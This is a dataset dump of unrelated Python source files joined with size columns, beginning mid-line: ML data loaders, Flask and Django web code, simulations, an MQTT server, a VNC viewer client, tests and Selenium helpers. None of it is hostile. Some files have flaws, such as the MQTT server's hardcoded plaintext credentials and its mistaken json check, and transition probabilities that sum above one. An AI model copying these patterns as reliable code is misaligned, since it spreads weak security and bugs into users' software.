s5EnMsTopNmmBkplType=s5EnMsTopNmmBkplType, s5EnMsTopBdgCompBdgMac1=s5EnMsTopBdgCompBdgMac1, s5EnMsTopBdgIpAddr=s5EnMsTopBdgIpAddr)
| 16,987 | 8,657 |
import argparse
import bittensor
import requests
import random
from munch import Munch
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
class BittensorDataLoader():
def __init__(self):
# IPFS hash of the genesis dataset
# TODO (shibshib): Find a proper way to set this as config instead of hardcoding it.
# More dataset hashes can be added as we add directories for other modalities.
self.genesis_text_dataset_hash = "QmXwfPoh2QFYqC6cYcW8kzyd9ruFfhnUi2kVBkdhawjUzj"
# Used to retrieve directory contentx
self.dag_get = 'https://ipfs.infura.io:5001/api/v0/dag/get'
# Used to retrieve file contents
self.file_cat = 'https://ipfs.infura.io:5001/api/v0/cat'
# Used when current corpus has been exhausted
self.refresh_corpus = False
@staticmethod
def default_config() -> Munch:
parser = argparse.ArgumentParser();
BittensorDataLoader.add_args(parser)
config = bittensor.config.Config.to_config(parser);
return config
@staticmethod
def add_args(parser: argparse.ArgumentParser):
""" Add model params
"""
parser.add_argument('--dataloader.max_corpus_size', default=1e+6, type=int,
help='Maximum amount of data to download from IPFS into memory for training.')
parser.add_argument('--dataloader.num_workers', default=0, type=int,
help='Number of workers for data loader.')
@staticmethod
def check_config(config: Munch):
pass
@staticmethod
def requests_retry_session(
retries=3,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None,
):
""" Creates a retriable session for request calls. This enables
automatic retries and back-off retries should any request calls fail.
Args:
retries (int, optional): Maximum number of retries. Defaults to 3.
backoff_factor (float, optional): Factor by which to back off if a retry fails. Defaults to 0.3.
status_forcelist (tuple, optional): A set of integer HTTP status codes that we should force a retry on. Defaults to (500, 502, 504).
session ([type], optional): Session for which to set up the retries. Defaults to None.
Returns:
requests.Session(): A Requests Session object set up for retries and backoff.
"""
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
def retrieve_directory(self, dir_hash: str):
"""Connects to Infura IPFS gateway and retrieves the directory of
genesis datasets.
Returns:
dict: A dictionary of the files inside of the genesis_datasets and their hashes.
"""
session = requests.Session()
params = (('arg', dir_hash),)
session.params.update(params)
directory = None
response = BittensorDataLoader.requests_retry_session(session=session).post(self.dag_get)
if response.status_code == 200:
directory = response.json()
return directory
def __len__(self):
""" Returns length of the dataset that the dataloader is processing
"""
pass
def __getitem__(self, idx):
"""returns the next batch from the dataset.
"""
pass | 3,835 | 1,100 |
from flask import Blueprint
from flask import request
from datetime import datetime
from commons import api_utils
from services import timezone_service
blueprint = Blueprint("api", __name__)
@blueprint.route('/timezones')
def timezones():
return api_utils.response(200, timezone_service.timezones())
@blueprint.route('/now')
def now():
try:
tz = request.args.get("timezone", default=None, type=str)
dt = timezone_service.convert_datetime(datetime.now(), tz)
return api_utils.response(200, dt)
except Exception:
return api_utils.response(400, 'Invalid timezone informed') | 619 | 183 |
"""
Configuration file for nii_to_mif.py
"""
#: i/o
INPUT_NODE_FIELDS = ["dwi_file", "fmap_file"]
OUTPUT_NODE_FIELDS = ["dwi_file", "fmap_file"]
#: Keyword arguments
LOCATE_ASSOCIATED_KWARGS = dict(
input_names=["in_file"],
output_names=["json_file", "bvec_file", "bval_file"],
)
| 290 | 132 |
# nopycln: file
from pyinspect.exceptions import install_traceback
from pyinspect.show import showme, what
from pyinspect.find import search
from pyinspect.answers import get_answers, ask
from pyinspect.panels import ok, warn, error, message, Report, NestedPanel
from pyinspect._rich import console
from pyinspect.classes import Enhanced
from pyinspect.builtins import List, Tuple, Dict, pilist, pidict
from pyinspect._colors import (
salmon,
lightsalmon,
orange,
mocassin,
lightblue,
lightorange,
gray,
)
from rich import pretty
pretty.install(
overflow="ellipse",
max_length=33,
)
try:
from github import Github
except Exception:
Github = None
__author__ = "Federico Claudi"
__license__ = "MIT"
__maintainer__ = "Federico Claudi"
__email__ = "federicoclaudi@protonmail.com"
__status__ = "dev"
__website__ = "https://github.com/FedeClaudi/pyinspect"
__version__ = "0.1.1rc"
def whats_pi():
"""
Prints a Report with an overview of `pyinspect`.
"""
# ? Intro
rep = Report(f"Pynspect", dim=orange, accent=orange)
rep._type = "Pyinspect info"
rep.width = 100
rep.add(
f"[b {lightorange}]The python package for lazy programmers",
justify="center",
)
# Features summary
rep.add(
f"""
[{salmon}]Don't remember a function's name?[/{salmon}] Use `pyinspect` to look for it.
[{salmon}]Don't remember what a function does?[/{salmon}] Use `pyinspect` to print its source code directly to your terminal.
[{salmon}]Can't figure out why you keep getting an error?[/{salmon}] Use `pyinspect`'s fancy tracebacks to figure it out
[{salmon}]Still can't figure it out, but too lazy to google it?[/{salmon}] Use `pyinspect` to print Stack Overflow's top answer for your error message directly to your terminal!
"""
)
# Package / Repo info as a nested panel
info = NestedPanel(color=mocassin, dim=mocassin)
_info = dict(
Author=__author__,
License=__license__,
Version=__version__,
Website=__website__,
)
if Github is not None:
n_stars = Github().get_repo("FedeClaudi/pyinspect").stargazers_count
_info["Github stars"] = n_stars
else:
warn(
"Could not fetch repo info",
"Perhaps `PyGithub` is not installed?s",
)
for k, v in _info.items():
info.add(f"[b {gray}]{k}[/b {gray}]: [{orange}]{v}", justify="right")
rep.add(info, "rich")
# Features examples
rep.add("""## Features""", "markdown", style=lightsalmon)
features = {
"Look up local variables": "pinspect.what()",
"Search functions by name": "pinspect.search(package, function_name)",
"Print source code to console": "pinspect.showme(function)",
"Enhanced tracebacks": "pinspect.install_traceback()",
"Render [i]Stack Overflow[/i] answers in the terminal": 'pinspect.ask("How to python?")',
}
for txt, code in features.items():
rep.spacer()
rep.add(f"[{gray}]" + txt, justify="center")
rep.add(" " + code, "code")
rep.spacer()
rep.add(f"[{lightorange}]... and a bunch of others!")
rep.spacer(2)
rep.add(f"[{lightsalmon}]Get in touch at:[/{lightsalmon}] {__website__}")
console.print(rep)
| 3,300 | 1,118 |
""" Variables that contain the logo ASCII text """
SERVER_TOOLS_LOGO = r"""
____ _____ _
/ ___| ___ _ ____ _____ _ __ |_ _|__ ___ | |___
\___ \ / _ \ '__\ \ / / _ \ '__| | |/ _ \ / _ \| / __|
___) | __/ | \ V / __/ | | | (_) | (_) | \__ \
|____/ \___|_| \_/ \___|_| |_|\___/ \___/|_|___/
"""
SCAN_PORTS_LOGO = r"""
___ ___ __ _ _ __ _ __ ___ _ __| |_ ___
/ __|/ __/ _` | '_ \ | '_ \ / _ \| '__| __/ __|
\__ \ (_| (_| | | | | | |_) | (_) | | | |_\__ \
|___/\___\__,_|_| |_| | .__/ \___/|_| \__|___/
"""
DNS_LOGO = r"""
____ _ _ ____
| _ \| \ | / ___|
| | | | \| \___ \
| |_| | |\ |___) |
|____/|_| \_|____/
"""
HOST_TO_IP_LOGO = r"""
_ _ _ _____ ___ ____
| | | | ___ ___| |_ |_ _|__ |_ _| _ \
| |_| |/ _ \/ __| __| | |/ _ \ | || |_) |
| _ | (_) \__ \ |_ | | (_) | | || __/
|_| |_|\___/|___/\__| |_|\___/ |___|_|
"""
| 965 | 497 |
# -*- coding: utf-8 -*-
import os
import numpy as np
from skimage import io
import matplotlib.pyplot as plt
from PIL import Image
def make_voc_segment_dataset(voc_directory: str, save_directory: str):
flag = False
## Set some directory
JPEGImages_dir = os.path.join(voc_directory, "JPEGImages")
SegmentationClass_dir = os.path.join(voc_directory, "SegmentationClass")
ImageSets_dir = os.path.join(voc_directory, "ImageSets", "Segmentation")
trainval_path = os.path.join(ImageSets_dir, "trainval.txt")
main_folder = os.path.join(save_directory, "VOCSegmentation")
train_folder = os.path.join(main_folder, "train")
train_images_folder = os.path.join(train_folder, "images")
train_masks_folder = os.path.join(train_folder, "masks")
train_visualization_folder = os.path.join(train_folder, "visualization")
## Check dataset
check_list = [train_images_folder, train_masks_folder, train_visualization_folder]
for check_path in check_list:
if os.path.exists(check_path):
if not os.listdir(check_path) or len(os.listdir(check_path)) != 2913:
raise ValueError(f"Detect incomplete data in {check_path}. "
"Please delete all data and unzip again.")
flag = False
else:
flag = True
print("Make some folders.")
if not os.path.exists(main_folder):
os.makedirs(main_folder, exist_ok=True)
if not os.path.exists(train_images_folder):
os.makedirs(train_images_folder, exist_ok=True)
if not os.path.exists(train_masks_folder):
os.makedirs(train_masks_folder, exist_ok=True)
if not os.path.exists(train_visualization_folder):
os.makedirs(train_visualization_folder, exist_ok=True)
print("Get data list.")
with open(trainval_path) as f:
t = f.read().split('\n')[:-1]
if flag:
print("Start to make dataset.")
for name in t:
## get file path
im_path = os.path.join(JPEGImages_dir, name+".jpg")
gt_path = os.path.join(SegmentationClass_dir, name+".png")
## read data
im = io.imread(im_path)
vs = Image.open(gt_path)
gt = Image.open(gt_path)
gt = np.array(gt)
gt[gt == 255] = 0
io.imsave(os.path.join(train_images_folder, os.path.basename(im_path)), im, check_contrast=False)
io.imsave(os.path.join(train_masks_folder, os.path.basename(gt_path)), gt, check_contrast=False)
vs.save(os.path.join(train_visualization_folder, os.path.basename(gt_path)))
print("Finished making dataset.")
else:
print("Already made dataset.") | 2,714 | 902 |
import pygame, sys
from pygame.locals import *
from robot import Robot
from wall import Wall
from leader import Leader
import random
def main(num_robots, width, height):
print "Initializing..."
#Create graphics window
pygame.init()
screen = pygame.display.set_mode((width, height),0,32)
pygame.display.set_caption('Swarm Simulation')
# walls = pygame.sprite.RenderUpdates()
robots = pygame.sprite.RenderUpdates()
clock = pygame.time.Clock()
screen.fill((255,255,255))
# w = Wall(100,300,200,20)
# walls.add(w)
# w = Wall(400,300,200,20)
# walls.add(w)
#Create Leader
#Do this first, so leader has id=0
leader = Leader(width/2, height/2)
robots.add(leader)
#Create robots
for i in range(0, num_robots):
r = Robot(width/2 + random.uniform(-100,100), height/2 + + random.uniform(-100,100))
robots.add(r)
print "Starting Simulation"
while (True):
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
for r in robots:
r.calc_force(robots)
# for w in walls:
# w.calc_forces(robots)
#Cycle forward
robots.update()
#Clear screen
screen.fill((255,255,255))
#Redraw
dirty = robots.draw(screen)
#Refresh screen
pygame.display.update()
#draw walls
# dirty = walls.draw(screen)
# pygame.display.update()
clock.tick(30)
main(5, 500, 500)
| 1,551 | 550 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
import profiles.urls
import accounts.urls
import trains.urls
import ticket.urls
from route.views import *
from station.views import *
from trains.views import *
from . import views
urlpatterns = patterns(
'',
url(r'^$', views.HomePage.as_view(), name='home'),
url(r'^about/$', views.AboutPage.as_view(), name='about'),
url(r'^', include(accounts.urls, namespace='accounts')),
url(r'^trains/', include(trains.urls, namespace='trains')),
url(r'^users/', include(profiles.urls, namespace='profiles')),
url(r'^ticket/', include(ticket.urls, namespace='ticket')),
url(r'^route/(?P<train_id>\d+)$', get_route_by_train, name='route'),
url(r'^search/', get_form, name='search'),
url(r'^display/', trainEnquiry, name='display'),
url(r'^admin/', include(admin.site.urls)),
)
urlpatterns += patterns('',
url(r'^captcha/', include('captcha.urls')),
)
# User-uploaded files like profile pics need to be served in development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 1,246 | 401 |
from games.gridworld.grid import Grid
from games.gridworld.gridworld import Gridworld
from games.gridworld.gridworld_direction import GridworldDirection
#####################################
# Example transition functions
#####################################
def deterministic_transition(action):
return [action], [1.0]
def shaky_transition(action):
dirs = list(GridworldDirection)
action_index = dirs.index(action)
side1 = dirs[action_index - 1]
side2 = dirs[action_index + 1]
return [action, side1, side2], [0.8, 0.2, 0.2]
#####################################
# Example Gridworlds
#####################################
simple_terminals = {(3, 1) : -50, (3, 2) : 50}
simple_living_reward = -1
simple_walls = {(1, 1)}
simple_grid_size = (4,3)
simple_start = (0, 0)
simple_grid = Grid(simple_terminals, simple_living_reward, simple_walls,
simple_grid_size)
bridge_crossing_terminals = {(x, y) : -100
for x in range(1, 6) for y in [0, 2]}
bridge_crossing_terminals.update({(6, 1) : 10})
bridge_crossing_walls = {(0, 0), (0, 2), (6, 0), (6, 2)}
bridge_crossing_size = (7, 3)
bridge_crossing_start = (0, 1)
bridge_crossing_grid = Grid(bridge_crossing_terminals, simple_living_reward,
bridge_crossing_walls, bridge_crossing_size)
def make_simple_gridworld(use_display):
return Gridworld(simple_grid, deterministic_transition,
simple_start, use_display)
def make_classic_gridworld(use_display):
return Gridworld(simple_grid, shaky_transition, simple_start, use_display)
def make_bridge_crossing_gridworld(use_display):
return Gridworld(bridge_crossing_grid, shaky_transition,
bridge_crossing_start, use_display)
| 1,798 | 606 |
#!/usr/bin/python3
import MQTTV3112 as MQTTV3
import traceback, datetime, os, sys, select, binascii
import time, traceback
import math
import socketserver
import json
import logging
from logging.handlers import RotatingFileHandler, TimedRotatingFileHandler
# create logger with 'spam_application'
logger = logging.getLogger('seeed_3thMqtt')
logger.setLevel(logging.INFO)
# create file handler which logs even debug messages
# fh = RotatingFileHandler('logs/_3mq_data.log', maxBytes=102400, backupCount=20)
fh = TimedRotatingFileHandler('./logs/seeed_3mq.log', when='midnight', backupCount=20)
fh.setLevel(logging.INFO)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
# Message types
CONNECT, CONNACK, PUBLISH, PUBACK, PUBREC, PUBREL, \
PUBCOMP, SUBSCRIBE, SUBACK, UNSUBSCRIBE, UNSUBACK, \
PINGREQ, PINGRESP, DISCONNECT = range(1, 15)
Username = 'seeed'
Passwd = b'sensecap'
def timestamp():
now = datetime.datetime.now()
return now.strftime('%Y%m%d %H%M%S')+str(float("."+str(now.microsecond)))[1:]
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
if not hasattr(self, "ids"):
self.ids = {}
if not hasattr(self, "versions"):
self.versions = {}
inbuf = True
terminated = False
client = self.request
#while inbuf != None and not terminated:
while inbuf != None and not terminated:
try:
inbuf = MQTTV3.getPacket(client) # get one packet
packet = MQTTV3.unpackPacket(inbuf)
if packet.fh.MessageType == MQTTV3.CONNECT:
self.ids[id(client)] = packet.ClientIdentifier
self.versions[id(client)] = 3
logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
'''
Check user name and passwd, device must be authorized by username and password
'''
logger.debug('Username={} passwd={}'.format(packet.username, packet.password))
if packet.username == Username and packet.password == Passwd:
logger.info("Device {} authorized!".format(self.ids[id(client)]))
else:
logger.error("Username or password invalid")
terminated = True
break
# Send downlink command
dl_str = '{\"type\":2,\"tmst\":\"' + '{}'.format(math.ceil(time.time()*1000)) + '\",\"intv\":300}'
downlinkconf = bytes(dl_str, 'utf-8')
client.sendall(downlinkconf)
logger.info('Send {}'.format(downlinkconf))
elif packet.fh.MessageType == MQTTV3.PUBLISH:
# Parse turn code
logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
json_obj = json.loads(packet.data)
if json != None:
logger.info('{}'.format(json_obj))
else:
logger.error("Decode json fail.")
elif packet.fh.MessageType == MQTTV3.DISCONNECT:
logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
logger.info("{} {}".format(self.ids[id(client)], " connection closing"))
client.close()
terminated = True
except:
terminated = True
class MyThreadingTCPServer(socketserver.ThreadingTCPServer):
allow_reuse_address = True
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 1884
logger.info("Listening on {} port {}".format(HOST, PORT))
server = MyThreadingTCPServer((HOST, PORT), MyTCPHandler)
server.serve_forever()
| 4,369 | 1,311 |
from aws_cdk import core, aws_eks
from .eks_base import EKSBase
from .alb_ingress import ALBIngressController
class EksSimpleFargateStack(core.Stack):
def __init__(self, scope: core.Construct, construct_id: str,
eks_version=aws_eks.KubernetesVersion.V1_19, cluster_name=None,
capacity_details='small', fargate_enabled=False, bottlerocket_asg=False,**kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
self.eks_version = eks_version
self.cluster_name = cluster_name
self.capacity_details = capacity_details
self.fargate_enabled = fargate_enabled
self.bottlerocket_asg = bottlerocket_asg
config_dict = {
'eks_version': self.eks_version,
'cluster_name': self.cluster_name,
'capacity_details': self.capacity_details,
'fargate_enabled': self.fargate_enabled,
'bottlerocket_asg': self.bottlerocket_asg
}
base_cluster = EKSBase(self, "Base", cluster_configuration=config_dict)
alb_ingress = ALBIngressController(self, "ALBIngress", cluster=base_cluster.cluster)
# The code that defines your stack goes here
| 1,187 | 376 |
#
# Gen2 observation workstation client -- command line version
#
"""
Gen2 observation workstation client -- command line version
"""
import sys, time, os
import threading
import binascii
from g2base import ssdlog, myproc
from g2base.remoteObjects import remoteObjects as ro
from g2base.remoteObjects import Monitor
from g2client import soundsink
# Default ports
default_svc_port = 19051
default_mon_port = 19052
# TODO: put this in a utilities module
def error(msg, exitcode=0):
"""Called for an error. Print _msg_ to stderr and exit program
with code _exitcode_ if _exitcode_ is set to non-zero.
"""
sys.stderr.write(msg + '\n')
if exitcode != 0:
sys.exit(exitcode)
class g2Disp(object):
def __init__(self, **kwdargs):
self.__dict__.update(kwdargs)
self.lock = threading.RLock()
self.procs = {}
# Needed for starting our own tasks
self.tag = 'g2disp'
self.shares = ['logger', 'threadPool']
def ro_echo(self, arg):
return arg
def start_server(self, rohosts, options):
# Initialize remoteObjects subsystem
try:
ro.init(rohosts)
except ro.remoteObjectError as e:
self.logger.error("Error initializing remote objects subsystem: %s" % \
str(e))
return
# channels we are interested in
channels = ['sound']
self.ev_quit = threading.Event()
self.server_exited = threading.Event()
# Create a local pub sub instance
# mymon = PubSub.PubSub('%s.mon' % self.basename, self.logger,
# numthreads=30)
monname = '%s.mon' % self.basename
mymon = Monitor.Monitor(monname, self.logger,
numthreads=options.numthreads,
ev_quit=self.ev_quit)
self.monitor = mymon
self.soundsink = soundsink.SoundSink(monitor=mymon,
logger=self.logger,
ev_quit=self.ev_quit)
self.soundsource = soundsink.SoundSource(monitor=mymon,
logger=self.logger,
channels=['sound'])
# Subscribe our callback functions to the local monitor
mymon.subscribe_cb(self.soundsink.anon_arr, channels)
self.mon_server_started = False
self.ro_server_started = False
# Startup monitor threadpool
mymon.start(wait=True)
mymon.start_server(wait=True, port=options.monport)
self.mon_server_started = True
self.threadPool = self.monitor.get_threadPool()
# subscribe our monitor to the central monitor hub
mymon.subscribe_remote(options.monitor, channels, ())
# publish to central monitor hub
#mymon.subscribe(options.monitor, channels, ())
mymon.publish_to(options.monitor, ['sound'], {})
self.svc = ro.remoteObjectServer(svcname=self.basename,
obj=self, logger=self.logger,
port=options.port,
ev_quit=self.ev_quit,
threadPool=self.threadPool,
#auth=None,
usethread=True)
self.svc.ro_start(wait=True)
self.ro_server_started = True
def stop_server(self):
self.logger.info("%s exiting..." % self.basename)
if self.mon_server_started:
self.logger.info("stopping monitor server...")
self.monitor.stop_server(wait=True)
if self.ro_server_started:
self.logger.info("stopping remote object server...")
self.svc.ro_stop(wait=True)
self.logger.info("stopping monitor client...")
self.monitor.stop(wait=True)
def viewerOn(self, localdisp, localgeom, remotedisp, passwd, viewonly):
self.muteOff()
passwd = binascii.a2b_base64(passwd)
passwd_file = '/tmp/v__%d' % os.getpid()
with open(passwd_file, 'wb') as out_f:
out_f.write(passwd)
# VNC window
cmdstr = "vncviewer -display %s -geometry=%s %s -passwd %s RemoteResize=0" % (
localdisp, localgeom, remotedisp, passwd_file)
if viewonly:
cmdstr += " -viewonly"
self.logger.info("viewer ON (-display %s -geometry=%s %s)" % (
localdisp, localgeom, remotedisp))
key = localdisp + localgeom
try:
self.procs[key].killpg()
except Exception as e:
pass
try:
self.procs[key] = myproc.myproc(cmdstr, usepg=True)
except Exception as e:
self.logger.error("viewer on error: %s" % (str(e)))
#os.remove(passwd_file)
return 0
def viewerOff(self, localdisp, localgeom):
self.muteOn()
self.logger.info("viewer OFF (%s)" % (localdisp))
try:
key = localdisp + localgeom
self.procs[key].killpg()
del self.procs[key]
except Exception as e:
self.logger.error("viewer off error: %s" % (str(e)))
return 0
def allViewersOff(self):
self.logger.info("All viewers OFF")
for key in list(self.procs.keys()):
try:
self.procs[key].killpg()
del self.procs[key]
except Exception as e:
self.logger.warn("viewer off error: %s" % (str(e)))
return 0
def muteOn(self):
self.soundsink.muteOn()
return 0
def muteOff(self):
self.soundsink.muteOff()
return 0
class CmdLineUI(object):
def __init__(self, options):
self.options = options
self.ev_quit = threading.Event()
def ui(self, obj):
obj.start_server(self.options.rohosts.split(','),
self.options)
try:
try:
while True:
print("Type ^C to exit the server")
sys.stdin.readline()
except KeyboardInterrupt:
print("Keyboard interrupt!")
finally:
obj.allViewersOff()
obj.stop_server()
def add_options(argprs):
argprs.add_argument("--debug", dest="debug", default=False,
action="store_true",
help="Enter the pdb debugger on main()")
argprs.add_argument("-c", "--channels", dest="channels", default='sound',
metavar="LIST",
help="Subscribe to the comma-separated LIST of channels")
argprs.add_argument("-m", "--monitor", dest="monitor", default='monitor',
metavar="NAME",
help="Subscribe to feeds from monitor service NAME")
argprs.add_argument("--monport", dest="monport", type=int,
default=default_mon_port, metavar="PORT",
help="Use PORT for our monitor")
argprs.add_argument("--numthreads", dest="numthreads", type=int,
default=50, metavar="NUM",
help="Use NUM threads in thread pool")
argprs.add_argument("--port", dest="port", type=int,
default=default_svc_port, metavar="PORT",
help="Use PORT for our monitor")
argprs.add_argument("--profile", dest="profile", action="store_true",
default=False,
help="Run the profiler on main()")
argprs.add_argument("--rohosts", dest="rohosts", default='localhost',
metavar="HOSTLIST",
help="Hosts to use for remote objects connection")
ssdlog.addlogopts(argprs)
def main(options, args, ui):
myhost = ro.get_myhost(short=False)
basename = 'g2disp-%s' % (myhost.replace('.', '_'))
logger = ssdlog.make_logger(basename, options)
# Make our callback object
mobj = g2Disp(logger=logger, basename=basename)
ui.ui(mobj)
| 8,196 | 2,412 |
import unittest
from builtins import next
from unittest import mock
from opentuner.search import manipulator
from opentuner.search.composableevolutionarytechniques import ComposableEvolutionaryTechnique
def faked_random(nums):
f = fake_random(nums)
def inner(*args, **kwargs):
return next(f)
return inner
def fake_random(nums):
i = 0
while True:
yield nums[i]
i = (i + 1) % len(nums)
class EmptyComposableEvolutionaryTechnique(ComposableEvolutionaryTechnique):
def __init__(self, *pargs, **kwargs):
super(EmptyComposableEvolutionaryTechnique, self).__init__(*pargs, **kwargs)
def minimum_number_of_parents(self):
return 4
def get_parents(self, population):
cfg = self.manipulator.copy(population[0].config)
return [cfg]
def update_population(self, config, population):
# replace the oldest configuration if the new one is better.
population[0].config = config
return population
class ComposableSearchTechniqueTests(unittest.TestCase):
def setUp(self):
self.operator_map = {}
ComposableEvolutionaryTechnique.add_to_map(self.operator_map,
manipulator.PermutationParameter,
"op3_cross", xchoice='op3_cross_CX')
ComposableEvolutionaryTechnique.add_to_map(self.operator_map,
"FloatArray",
"op3_cross", strength=0.4)
self.technique = EmptyComposableEvolutionaryTechnique(operator_map=self.operator_map)
def test_add_to_map(self):
op_map = {}
op_map[manipulator.PermutationParameter] = {'op_name': 'op3_cross',
'args': (),
'kwargs': {'xchoice': 'op3_cross_CX'}}
op_map[manipulator.FloatArray] = {'op_name': 'op3_cross',
'args': (),
'kwargs': {'strength': 0.4}}
self.assertDictEqual(self.operator_map, op_map)
def test_get_default_oeprator(self):
default = self.technique.get_default_operator(manipulator.PermutationParameter)
self.assertDictEqual(default, {'op_name': 'op1_nop', 'args': [], 'kwargs': {}})
def test_get_operator(self):
default = self.technique.get_operator(manipulator.IntegerParameter)
self.assertDictEqual(default, {'op_name': 'op1_nop', 'args': [], 'kwargs': {}})
default = self.technique.get_operator(manipulator.PermutationParameter)
self.assertDictEqual(default, {'op_name': 'op3_cross', 'args': (), 'kwargs': {'xchoice': 'op3_cross_CX'}})
@mock.patch('opentuner.search.manipulator.PermutationParameter.op3_cross')
def test_apply_operator(self, op3_cross_func):
param_instance = manipulator.PermutationParameter('temp', [1, 2, 3, 4, 5])
self.technique.apply_operator(param_instance, ['p1', 'p2', 'p3', 'p4'])
op3_cross_func.assert_called_once_with('p1', 'p2', 'p3', xchoice='op3_cross_CX')
# TODO tests for RandomThreeParentsComposableTechnique
| 3,251 | 1,016 |
import time
import re
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException
from uritemplate import expand as uriexpand
from logging import getLogger
__version__ = '0.0.4'
logger = getLogger(__name__)
def logged(func):
def wrapper(*args, **kwargs):
try:
qualfuncname = f"{func.__qualname__}"
logger.info(f"started {qualfuncname}, params: {args} and {kwargs}")
return func(*args, **kwargs)
except Exception as e:
logger.exception(e)
return wrapper
class Element(object):
def __init__(self, by, selector):
self.by = by
self.selector = selector
def __get__(self, obj, klass):
if hasattr(obj, 'base_element') and obj.base_element is not None:
return obj.base_element.find_element(self.by, self.selector)
else:
return obj.driver.find_element(self.by, self.selector)
class Elements(object):
def __init__(self, by, selector):
self.by = by
self.selector = selector
def __get__(self, obj, klass):
if hasattr(obj, 'base_element') and obj.base_element is not None:
return obj.base_element.find_elements(self.by, self.selector)
else:
return obj.driver.find_elements(self.by, self.selector)
class SupportMethodGenerator(object):
def __init__(self, timeout=10):
self.timeout = timeout
def wait_until_element_visible(self, by, selector):
this = self
def inner(self, timeout=this.timeout):
wait = WebDriverWait(self.driver, timeout)
wait.until(
EC.visibility_of_element_located((by, selector))
)
return self.driver.find_element(by, selector)
return inner
def wait_until_element_invisible(self, by, selector):
this = self
def inner(self, timeout=this.timeout):
wait = WebDriverWait(self.driver, timeout)
wait.until(
EC.invisibility_of_element_located((by, selector))
)
return None
return inner
def wait_until_element_to_be_clickable(self, by, selector):
this = self
def inner(self, timeout=this.timeout):
wait = WebDriverWait(self.driver, timeout)
wait.until(
EC.element_to_be_clickable((by, selector))
)
return self.driver.find_element(by, selector)
return inner
def has_element(self, by, selector):
this = self
def inner(self):
try:
self.driver.find_element(by, selector)
return True
except NoSuchElementException:
return False
return inner
def has_no_element(self, by, selector):
this = self
def inner(self):
try:
self.driver.find_element(by, selector)
return False
except NoSuchElementException:
return True
return inner
def element_element(self, by, selector):
this = self
def inner(self):
return self.driver.find_element(by, selector)
return inner
def element_elements(self, by, selector):
this = self
def inner(self):
return self.driver.find_elements(by, selector)
return inner
class Section(object):
def __init__(self, klass, base_by, base_selector):
self.klass = klass
self.base_by = base_by
self.base_selector = base_selector
def __get__(self, obj, klass):
base_element = obj.driver.find_element(self.base_by, self.base_selector)
return self.klass(obj.driver, base_element=base_element)
class Sections(object):
def __init__(self, klass, base_by, base_selector):
self.klass = klass
self.base_by = base_by
self.base_selector = base_selector
def __get__(self, obj, klass):
base_elements = obj.driver.find_elements(self.base_by, self.base_selector)
return [self.klass(obj.driver, base_element=base_element) for base_element in base_elements]
class Iframe(object):
def __init__(self, klass, base_by, base_selector):
self.klass = klass
self.base_by = base_by
self.base_selector = base_selector
def __get__(self, obj, klass):
iframe_element = obj.driver.find_element(self.base_by, self.base_selector)
return self.klass(obj.driver, iframe_element=iframe_element)
class PageMetaclass(type):
def __new__(cls, name, bases, dict_):
for k, v in list(dict_.items()):
if isinstance(v, Element) or isinstance(v, Elements):
smg = SupportMethodGenerator()
dict_[f"wait_until_{k}_visible"] = smg.wait_until_element_visible(v.by, v.selector)
dict_[f"wait_until_{k}_invisible"] = smg.wait_until_element_invisible(v.by, v.selector)
dict_[f"wait_until_{k}_to_be_clickable"] = smg.wait_until_element_to_be_clickable(v.by, v.selector)
# Elementsのときもfind_elementが使われるため、「少なくとも1つのelementがあるかどうか」が検査される
dict_[f"has_{k}"] = smg.has_element(v.by, v.selector)
dict_[f"has_no_{k}"] = smg.has_no_element(v.by, v.selector)
if isinstance(v, Element):
dict_[f"{k}_element"] = smg.element_element(v.by, v.selector)
elif isinstance(v, Elements):
dict_[f"{k}_elements"] = smg.element_elements(v.by, v.selector)
if isinstance(v, Section) or isinstance(v, Sections) or isinstance(v, Iframe):
smg = SupportMethodGenerator()
dict_[f"wait_until_{k}_visible"] = smg.wait_until_element_visible(v.base_by, v.base_selector)
dict_[f"wait_until_{k}_invisible"] = smg.wait_until_element_invisible(v.base_by, v.base_selector)
# Sectionsのときもfind_elementが使われるため、「少なくとも1つのelementがあるかどうか」が検査される
dict_[f"has_{k}"] = smg.has_element(v.base_by, v.base_selector)
dict_[f"has_no_{k}"] = smg.has_no_element(v.base_by, v.base_selector)
if isinstance(v, Section):
dict_[f"{k}_element"] = smg.element_element(v.base_by, v.base_selector)
elif isinstance(v, Sections):
dict_[f"{k}_elements"] = smg.element_elements(v.base_by, v.base_selector)
elif isinstance(v, Iframe):
dict_[f"{k}_element"] = smg.element_element(v.base_by, v.base_selector)
return type.__new__(cls, name, bases, dict_)
class Page(object, metaclass=PageMetaclass):
_url = None
_url_matcher = None
def __init__(self, driver):
self.driver = driver
@logged
def load(self, **kwargs):
if self._url:
uri = uriexpand(self._url, **kwargs)
self.driver.get(uri)
else:
raise Exception(f"Cant load. {self.__class__} has not _url parameter")
@logged
def is_loaded(self):
if self._url_matcher:
if re.fullmatch(self._url_matcher, self.current_url):
return True
else:
return False
elif self._url:
if self._url == self.current_url:
return True
else:
return False
else:
raise Exception(f"Cant load check. {self.__class__} has neither _url and _url_matcher parameter")
